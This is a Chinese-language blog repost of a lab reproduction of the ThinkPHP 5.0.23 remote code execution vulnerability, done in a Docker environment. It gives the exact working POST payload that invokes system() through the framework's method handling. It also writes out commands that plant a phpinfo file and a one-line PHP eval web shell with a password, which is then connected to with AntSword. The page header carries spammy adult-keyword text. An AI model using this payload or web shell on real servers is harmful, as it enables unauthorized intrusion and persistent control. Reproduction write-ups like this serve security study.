国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

漏洞形成原因

  • 框架介紹:
    ThinkPHP是一款運(yùn)用極廣的PHP開發(fā)框架。
  • 漏洞引入:
    其5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。

漏洞如何利用

  • 1、訪問靶機(jī)地址+端口號(hào) 進(jìn)入首頁
  • 2、Burp抓包修改傳參方式為Post,傳入?yún)?shù)為"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd為系統(tǒng)執(zhí)行命令可進(jìn)行一系列操作。

漏洞復(fù)現(xiàn)過程

  • Kali docker 容器中啟動(dòng)此漏洞環(huán)境
    Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)
  • 瀏覽器訪問 Kali 的 ip 地址接上8080端口

Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

  • Burp抓包修改傳參方式為Post,url后接入/index.php?s=captch,傳入?yún)?shù)為"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
    Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)
/index.php?s=captcha		#url后接
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd	#POST傳入?yún)?shù)
  • Burp Go Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

  • 嘗試寫入phpinfo

echo "<?php phpinfo(); ?>" > info.php

Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)

  • 成功!
    Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)
  • 寫入一句話
echo '<?php eval($_POST[aaa]); ?>' > shell.php	#密碼:aaa

Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-464494.html

  • 上蟻劍!
    Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)
  • 漏洞復(fù)現(xiàn)成功
    參考文章:https://www.cnblogs.com/zenb/p/14537240.html
    技術(shù)萌新,還請(qǐng)各位大牛多多指點(diǎn)!

到了這里,關(guān)于Thinkphp5.0.23 rce(遠(yuǎn)程代碼執(zhí)行)的漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

    ThinkPHP5遠(yuǎn)程命令執(zhí)行漏洞

    ThinkPHP是一個(gè)快速、兼容而且簡(jiǎn)單的輕量級(jí)國產(chǎn) PHP開發(fā)框架?,誕生于2006年初,原名FCS,2007年元旦正式更名為ThinkPHP,遵循Apache2開源協(xié)議發(fā)布,使用面向?qū)ο蟮拈_發(fā)結(jié)構(gòu)和 MVC模式 ,從Struts結(jié)構(gòu)移植過來并做了改進(jìn)和完善,同時(shí)也借鑒了國外很多優(yōu)秀的框架和模式。 由于th

    2024年02月11日
    瀏覽(25)
  • ThinkPHP5.0.21遠(yuǎn)程命令執(zhí)行漏洞

    ThinkPHP5.0.21遠(yuǎn)程命令執(zhí)行漏洞

    漏洞出現(xiàn)的背景 : ThinkPHP是?款運(yùn)?極?的PHP開發(fā)框架。 其5.0.23以前的版本中,獲取method的?法中沒有正確處理?法名, 導(dǎo)致攻擊者可以調(diào)?Request類任意?法并構(gòu)造利?鏈,從?導(dǎo)致遠(yuǎn)程代碼執(zhí)?漏洞。 由于ThinkPHP5框架對(duì)控制器名沒有進(jìn)??夠的安全檢測(cè),導(dǎo)致在沒有開

    2024年02月04日
    瀏覽(23)
  • ThinkPHP5.0.0~5.0.23路由控制不嚴(yán)謹(jǐn)導(dǎo)致的RCE

    ThinkPHP5.0.0~5.0.23路由控制不嚴(yán)謹(jǐn)導(dǎo)致的RCE

    本次我們繼續(xù)以漏洞挖掘者的視角,來分析thinkphp的RCE 敏感函數(shù)發(fā)現(xiàn) 在調(diào)用入口函數(shù):/ThinkPHP_full_v5.0.22/public/index.php 時(shí) 發(fā)現(xiàn)了框架底層調(diào)用了thinkphplibrarythinkApp.php的app類中的incokeMethod方法 ?注意傳遞的參數(shù),ReflectionMethod接受的參數(shù)。如果是數(shù)組的形式, 那么參數(shù)1是這個(gè)

    2024年01月23日
    瀏覽(17)
  • RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    RCE 遠(yuǎn)程代碼執(zhí)行漏洞分析

    Remote Command/Code Execute 遠(yuǎn)程命令執(zhí)行/遠(yuǎn)程代碼執(zhí)行漏洞 這種漏洞通常出現(xiàn)在應(yīng)用程序或操作系統(tǒng)中,攻擊者可以通過利用漏洞注入惡意代碼,并在受攻擊的系統(tǒng)上執(zhí)行任意命令。 PHP 代碼執(zhí)行 PHP 代碼注入 OS 命令執(zhí)行 OS 命令注入 Java、Python…… Web 應(yīng)用程序 遠(yuǎn)程服務(wù) 操作系統(tǒng)

    2024年02月08日
    瀏覽(30)
  • RCE(遠(yuǎn)程命令執(zhí)行)漏洞詳解

    RCE(remote command/code execute,遠(yuǎn)程命令執(zhí)行)漏洞 遠(yuǎn)程代碼執(zhí)行 (RCE) 攻擊是指攻擊者可以在一個(gè)組織的計(jì)算機(jī)或網(wǎng)絡(luò)上運(yùn)行惡意代碼。執(zhí)行攻擊者控制的代碼的能力可用于各種目的,包括部署額外的惡意軟件或竊取敏感數(shù)據(jù)。 遠(yuǎn)程代碼執(zhí)行攻擊通常通過網(wǎng)絡(luò)應(yīng)用程序和網(wǎng)絡(luò)基礎(chǔ)

    2024年04月10日
    瀏覽(31)
  • RCE遠(yuǎn)程命令執(zhí)行漏洞挖掘思路

    RCE遠(yuǎn)程命令執(zhí)行漏洞挖掘思路

    1.URL上 在 url參數(shù)上 ,不僅僅可能存在ssrf漏洞,也有很大概率存在命令執(zhí)行,很大可能調(diào)用系統(tǒng)命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如訪問到如下URL,在jsp后面嘗試加參數(shù),比如path(什么參數(shù)需要試) ? ? http://x.x.x.x:28076/file/dirF

    2024年02月01日
    瀏覽(22)
  • 4.9、漏洞利用 smb-RCE遠(yuǎn)程命令執(zhí)行

    4.9、漏洞利用 smb-RCE遠(yuǎn)程命令執(zhí)行

    目錄 1、samba服務(wù)介紹 2、漏洞相關(guān)信息 3、探測(cè)samba 4、metasploit利用 5、samba歷年漏洞 1.1 samba是在Linux和UNIX系統(tǒng)上實(shí)現(xiàn)SMB協(xié)議的一個(gè)免費(fèi)軟件,由服務(wù)器及客戶端程序構(gòu)成。 1.2 SMB(Server Messages Block,信息服務(wù)塊)是一種在局域網(wǎng)上共享文件和打印機(jī)的一種通信協(xié)議,它為局域

    2024年02月07日
    瀏覽(25)
  • HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    HVV爆火漏洞:最新 WPS RCE (遠(yuǎn)程命令執(zhí)行) 復(fù)現(xiàn)

    最近HVV爆出的很火的WPS命令執(zhí)行漏洞,其實(shí)并不是0DAY,早在2019年就出現(xiàn)了,只不過最近EXP才公開。接下來我們來復(fù)現(xiàn)一遍。 WPS Office 2023 個(gè)人版 11.1.0.15120 WPS Office 2019 企業(yè)版 11.8.2.12085 wps版本: WPS V11.1.0.12300 靶機(jī): windows 10 攻擊機(jī): ubuntu 20.04 ????IP:192.168.2.103 WPS 內(nèi)置了一

    2024年02月11日
    瀏覽(22)
  • RCE代碼執(zhí)行漏和命令執(zhí)行漏洞

    RCE代碼執(zhí)行漏和命令執(zhí)行漏洞

    前置知識(shí): 漏洞檢測(cè): 在了解漏洞概念前,應(yīng)該先知道一下這個(gè)漏洞如何檢測(cè)的,我們應(yīng)該或多或少聽過白盒測(cè)試(白盒),黑盒測(cè)試(黑盒)。 白盒測(cè)試: 白盒測(cè)試是對(duì)源代碼和內(nèi)部結(jié)構(gòu)的測(cè)試,測(cè)試人員是可以知道內(nèi)部的邏輯和結(jié)構(gòu)的,差不多就是代碼審計(jì)。 黑盒測(cè)試:

    2024年02月19日
    瀏覽(31)
  • Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    Thinkphp5.x全漏洞復(fù)現(xiàn)分析

    我們可以把namespace理解為一個(gè)單獨(dú)的空間,事實(shí)上它也就是一個(gè)空間而已,子命名空間那就是空間里再劃分幾個(gè)小空間,舉個(gè)例子: 當(dāng)有多個(gè)子命名空間有相同名稱類時(shí),不指定使用哪個(gè)命名空間的情況下取最后定義的命名空間中的類,比如上面的 dog 取的時(shí) dogC 中的類,在

    2024年04月22日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包